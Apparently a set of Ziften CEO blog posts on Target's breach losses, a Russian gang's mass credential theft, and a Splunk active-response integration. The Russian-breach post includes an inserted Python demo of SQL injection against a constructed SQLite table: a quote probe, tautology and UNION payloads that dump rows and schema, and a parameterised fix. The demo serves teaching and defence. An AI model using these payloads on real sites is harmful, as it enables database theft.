Charles Leaver – A Very Slow Recovery And Financial Losses Showed Target The Importance Of Robust Cyber Security Defenses

By Charles Leaver CEO Ziften


After Target was breached, it took the company many months to recover and be given a clean bill of health.

Continuous Recovery Effort And Reports Of Financial Loss

Target's struggle with its data breach was a major story. Like all big news stories it eventually faded from national coverage, but for the company it remained a top priority. The retailer cut its revenue projections for 2014 once again, which suggests that the business had underestimated the effect of the attack it suffered, according to CNN Money.

The decline in earnings was considerable: the company reported 62% lower profit. On top of that it booked $111 million in breach-related costs in the second fiscal quarter, and a business that was once robust now looks a shadow of its former self because of a cyber attack.

As the fallout continued, the scale of the attack became clear. Information on around 110 million people was compromised, and 40 million of those people had payment card data stolen. As news of the breach spread, the company made major changes, including stricter cyber security procedures and a change of system administrator. Long-standing CEO Gregg Steinhafel also resigned. But this is not considered enough to reduce the effect of the attack: Target's shareholders are absorbing the negative effects of the attack as much as the business itself, according to Brian Sozzi of Belus Capital.

In an e-mail to CNN Money, Sozzi stated: “Target just dropped an epic complete-year profits warning onto the heads of its remaining investors. Target has given investors ABSOLUTELY NO reason to be encouraged that an international turn-around is secretly emerging.”

Target Offers A Lesson For All Organizations About Improved Pre-emptive Procedures

No matter how proactively a company responds to a cyber attack, there is no guarantee that recovery will be quick. The bottom line is that a data breach is bad news for any company, whatever you call it and however you try to fix it. Prevention is the best way forward: take steps to make sure an attack does not happen to your company in the first place. Endpoint threat detection systems can play a significant role in maintaining strong defenses for any organization that implements them.


Hackers From Russia Stole Massive Amounts Of Personal Data And This Could Have Been Prevented With Continuous Endpoint Monitoring – Charles Leaver

Charles Leaver Ziften CEO

What is thought to be the largest known cyber attack in the history of data breaches has been uncovered by an American cyber security company. The company believes that a group of Russian cyber criminals it has been investigating for many months is responsible for stealing billions of passwords and other sensitive personal data. The Russian group is said to have stolen 4.5 billion credentials; many were duplicates, leaving 1.2 billion unique data profiles. The group took the details from 420,000 websites of all sizes, from big brand sites to small mom-and-pop shops.

The New York Times reported that the group consisted of about a dozen individuals. Starting with small-scale spamming in 2011, they acquired most of the data by purchasing stolen databases.

In an interview with PCMag, Alex Holden, the founder of the company that found the breach, said: “the gang began by simply buying the databases that were readily available over the Internet.” The group used to buy at fire sales and were referred to as “bottom feeders”. As time went by they moved on to purchasing higher-quality databases. “It’s sort of like graduating from taking bikes to stealing expensive automobiles.”

A Graduation From Spamming To Using Botnets

The group then changed its approach, using botnets to harvest stolen credentials on a much larger scale. The botnets let the group automate the identification of vulnerable sites, so the work went on around the clock. Whenever an infected user's machine visited a website, the bot automatically tested whether the site was vulnerable to SQL injection. SQL injection is a widely used attack technique: crafted input is inserted into a database query so that the site's database is made to reveal its contents. The botnets flagged the vulnerable sites, and the hackers returned later to extract the data. Using the botnet was ultimately the group's undoing, since its activity is what led the security company to discover them.
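As an added illustration (this is not part of the original post, and not code from the group or the security company), the following Python sketch shows the two halves of the technique described above against a constructed in-memory SQLite table: the automated probe that flags a site whose query breaks on a stray quote, and the follow-up "basic query" payloads that make the database reveal its contents. A parameterised lookup is placed beside the vulnerable one to show why the same payloads fail against it. The table name, user names and password hashes are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for a small site's user table (not real credentials).
SAMPLE_USERS = [
    ("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("bob", "e10adc3949ba59abbe56e057f20f883e"),
    ("carol", "25d55ad283aa400af464c76d713c07ad"),
]

CREATE_USERS = "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"


def build_db():
    """Create an in-memory SQLite database that plays the part of a site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_USERS)
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, username):
    """The classic mistake: user input is pasted straight into the SQL text."""
    sql = f"SELECT username, password_hash FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, username):
    """The fix: a parameterised query. The value travels separately from the SQL text,
    so it can never change the structure of the query."""
    sql = "SELECT username, password_hash FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def probe_for_sqli(lookup, conn):
    """Mimic the botnet's automated check: feed a stray quote and see whether the backend
    chokes on it. A database syntax error is a strong sign that input reaches the query text
    unescaped, so the site gets flagged for a later visit."""
    try:
        lookup(conn, "x'")
    except sqlite3.OperationalError:
        return True
    return False


def dump_table(lookup, conn):
    """Follow-up step one: a basic tautology makes the WHERE clause match every row."""
    return lookup(conn, "' OR '1'='1")


def dump_schema(lookup, conn):
    """Follow-up step two: a UNION payload pulls rows from a different table (here SQLite's
    own catalogue), so the 'basic query' reveals far more than the single row the application
    intended. The trailing -- comments out the closing quote the application appends."""
    return lookup(conn, "' UNION SELECT name, sql FROM sqlite_master--")


if __name__ == "__main__":
    conn = build_db()
    for name, lookup in (("vulnerable", lookup_user_vulnerable), ("parameterised", lookup_user_safe)):
        print(f"{name}: injectable={probe_for_sqli(lookup, conn)}, "
              f"rows dumped={len(dump_table(lookup, conn))}, "
              f"schema rows leaked={len(dump_schema(lookup, conn))}")
```

Against the vulnerable lookup the probe reports an injectable site, the tautology returns every user row, and the UNION payload returns the table definition from the catalogue; against the parameterised lookup all three payloads are treated as literal user names and return nothing. The same probe-then-extract pattern scaled across a botnet is what the article describes.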

The security company believes the billions of records were not stolen all at once, and that most of them were probably bought from other cyber criminals. According to the Times, few of the stolen records have been offered for sale online; instead the group has chosen to use the data to send spam on social media on behalf of other groups, for a fee. Other cyber security experts say the magnitude of this breach is part of a pattern of criminals gradually stockpiling huge numbers of personal profiles and saving them for future use, according to the Wall Street Journal.

Avivah Litan, security analyst at the research firm Gartner, said: “companies that count on user names and passwords need to cultivate a sense of urgency about changing this. Until they do, crooks will just keep stockpiling people’s credentials.”

Attacks and breaches on this scale underline the need for companies to protect themselves with up-to-date cyber security defenses. Endpoint threat detection and response systems give organizations a clearer picture of the threats facing their networks and actionable information on how best to resist attacks. With huge data breaches becoming more frequent, continuous endpoint visibility is important to the security of an organization. If the company's network is monitored continuously, threats can be identified in real time, which limits the damage a data breach can do to an organization's reputation and bottom line.


Charles Leaver – What Can The Ziften And Splunk Active Response Framework Do For You?

Written By Charles Leaver CEO Ziften



We sponsored a fantastic Splunk.conf2014 in Las Vegas, and we returned energized and chomping at the bit to push our service here at Ziften even further forward. One talk of particular interest was by Jose Hernandez, Security Solutions Architect for Splunk, titled “Utilizing Splunk to Automatically Alleviate Threats”. If you wish to see his slides and a recording of the presentation, please go to

Using Splunk to help with mitigation, or as I prefer to call it, “Active Response”, is an excellent idea. Having all your intelligence data streaming into Splunk is extremely powerful, whether it is endpoint data, external threat feeds or anything else, and being able to act on that data really closes the loop. At Ziften we have our powerful continuous endpoint monitoring solution, and its integration with Splunk is something we are truly proud of. Pairing real-time data analysis with the ability to respond and act on events is a strong move in the right direction.

Ziften has created a mitigation action using the available Active Response code; a demo video is included in this post below. As a proof of concept we built a mitigation action within our Ziften App for Splunk. Once the action has run, its results can be observed and tracked within Splunk ES (Enterprise Security). This is a significant addition: users can now monitor and track mitigations within Splunk ES, which gives you the major benefit of closing the loop and building a history of your actions.

We are thrilled that Splunk is driving such an effort; it is likely to evolve, and we are committed to supporting it and developing it further. It is a very exciting time in the Endpoint Detection and Response space, and in my view the Active Response Framework built into Splunk will generate a high degree of interest.

For any questions about the Ziften App for Splunk, please send an e-mail to